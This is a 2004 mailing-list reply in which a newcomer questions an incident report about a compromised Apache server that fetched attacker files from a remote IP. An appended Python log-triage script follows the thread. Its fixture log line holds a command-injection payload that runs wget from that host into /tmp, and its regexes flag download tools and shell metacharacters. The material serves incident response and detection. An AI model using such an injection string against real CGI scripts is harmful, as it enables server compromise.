Hi Mark,

I'm not sure I can follow everything concerning this issue. Maybe you could clarify this somehow so that a n00b like me can follow ;-)

On Tue, 13.01.2004 at 16:20, Retallack, Mark (Siemens) wrote:

> It looks like the source was left on the server (along with other things):

Is this just another compromised machine or the origin? A portscan shows several open ports and the machine seems to be a Solaris 8 with an estimated uptime of 33 days according to nmap.

> httpREMOVE://218.234.171.84/manual/.x/rs.c
>
> Only follow the link if you know what you are doing (and remove the REMOVE text)

I don't quite understand why displaying rs.c in a browser window could be harmful, or am I missing something here and this URL initiates something else inside the browser?

> The rest of the files:
>
> httpREMOVE://218.234.171.84/manual/.x/

I've given them a look. Has anybody ever heard of a "pokemon squadron hacking team"?!

> Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do".

Do you know how this CGI ended up on the machine? By some Apache exploit maybe?

> wwwrun:nogroup are standard user and group used for apache.

Can such a CGI do any harm by running as this user? Or are CGI scripts run by Apache initiated by another user?

Kind regards,
Tobias
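As an added example, not part of this thread: a small Python triage script that scans Apache access-log lines for CGI requests whose parameters carry a download tool, a write into /tmp, or shell metacharacters, and reports the client and the host it fetched from. The log lines are constructed for illustration; the script name count.cgi and the client address are assumptions, only the fetch host and /tmp/.do come from the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines for illustration; not from the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2004:15:58:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
10.0.0.9 - - [13/Jan/2004:16:02:17 +0000] "GET /cgi-bin/search.cgi?q=linux HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.77 - - [13/Jan/2004:16:03:44 +0000] "GET /cgi-bin/count.cgi?p=;wget%20http://218.234.171.84/manual/.x/rs.c%20-O%20/tmp/.do HTTP/1.0" 200 0 "-" "-"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# Indicators a defender looks for in CGI parameters: a download tool name,
# a write into /tmp (hidden dotfiles included), or shell command separators.
DOWNLOADERS = re.compile(r'\b(wget|curl|fetch|lynx)\b', re.IGNORECASE)
TMP_WRITE = re.compile(r'/tmp/\.?\w')
SHELL_META = re.compile(r'[;|`$]')
URL_IN_PARAM = re.compile(r'https?://([^/\s]+)')

def triage_line(line):
    """Return a finding dict for a suspicious CGI request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    if "/cgi-bin/" not in uri or "?" not in uri:
        return None
    query = unquote_plus(uri.split("?", 1)[1])  # decode %20 etc. before matching
    reasons = []
    if DOWNLOADERS.search(query):
        reasons.append("download tool in parameter")
    if TMP_WRITE.search(query):
        reasons.append("write to /tmp")
    if SHELL_META.search(query):
        reasons.append("shell metacharacter")
    if not reasons:
        return None
    host = URL_IN_PARAM.search(query)
    return {
        "client": m.group("ip"),
        "time": m.group("ts"),
        "script": uri.split("?", 1)[0],
        "fetch_host": host.group(1) if host else None,  # where the payload was pulled from
        "reasons": reasons,
    }

def triage_log(text):
    """Run triage_line over every line of an access log and keep the findings."""
    return [f for f in (triage_line(l) for l in text.splitlines()) if f]
```

Running `triage_log(SAMPLE_LOG)` on the constructed lines yields one finding, for the count.cgi request that fetched from 218.234.171.84 into /tmp/.do; the fetch host is a ready-made pivot for checking firewall or proxy logs for other hosts that contacted it.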